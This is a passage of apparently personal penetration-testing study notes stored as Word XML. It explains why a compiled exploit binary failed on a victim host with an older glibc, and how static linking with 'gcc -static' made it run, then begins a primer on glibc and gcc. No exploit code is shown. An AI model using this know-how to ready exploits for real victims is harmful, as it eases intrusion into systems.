    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To fix this, we can just pack all the dependencies inside of the exploit-1 executable. We can do this with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-static</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1492"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -static exploit-1.c -o exploit-1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This turns exploit-1 from previous a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamically linked executable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which was small, but needs very specific dependencies) into a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> static executable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (large but has all the dependencies inside of it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Putting it together (your case):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003610">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali, gcc linked your exploit to glibc 2.33 (in /lib/x86_64-linux-gnu/libc.so.6 on Kali).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003611">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your binary then recorded "I require GLIBC_2.33 symbols."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the victim, libc.so.6 was only version 2.31 → missing those symbols → runtime error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003613">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you added -static, gcc copied the glibc code directly into your binary. No .so loading was needed anymore, so the victim’s older glibc didn’t matter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003614">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003615">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think this would have worked without static if the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLIBC of the my Kali was less than or equal to the GLIBC of the victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003616">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003617">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is it explained in-depth:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003618">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003619">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamically linked ELF:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Normally, when you compile with just gcc exploit.c -o exploit, you get a dynamically linked ELF. That means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your binary only contains your code + stubs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At runtime, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic linker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib64/ld-linux-x86-64.so.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) loads in shared libraries (libc.so.6, libm.so.6, etc.) from the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The problem: your Kali had glibc 2.33/2.34, so your binary recorded "I need those exact versions." On the victim, the system libraries were older (say 2.31). When the dynamic linker tried to resolve symbols, it failed with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version `GLIBC_2.33' not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003620">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you add -static:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The compiler copies all the needed libc code directly into the binary at build time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003622">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The result is a self-contained executable: no need to load the victim’s /lib/x86_64-linux-gnu/libc.so.6 at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003623">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s why it ran fine — it no longer cared what version of glibc the victim had.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003624">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003625">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why it fixed your issue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003626">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic binary → depends on victim’s glibc → version mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Static binary → bundles its own libc → no mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003628">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003629">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downsides of -static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bigger binary: static glibc executables can be 1–2+ MB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reduced flexibility: if libc has a security update, your binary doesn’t benefit (but for an exploit that’s fine).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NSS limitations: fully static glibc builds don’t support some name resolution backends (/etc/nsswitch.conf), so gethostbyname() or looking up users/groups in /etc/passwd can behave oddly. Using raw IPs avoids this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yth69kfo7fpl" w:id="484"/>
      <w:bookmarkEnd w:id="484"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Glibc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003630">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003631">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is glibc, and how does it relate to gcc?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003632">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glibc (GNU C Library) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the standard C runtime library on Linux. It’s the implementation of all the C standard functions (printf, malloc, strcpy, fork, execve, socket, …). It’s also the layer that wraps system calls (glibc calls into the kernel).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003633">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc (GNU Compiler Collection) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is just the compiler/driver. It translates your .c file into machine code and then links your program. When gcc links, it pulls in glibc (unless you tell it not to).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003634">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003635">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003636">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You write code that calls printf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003637">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
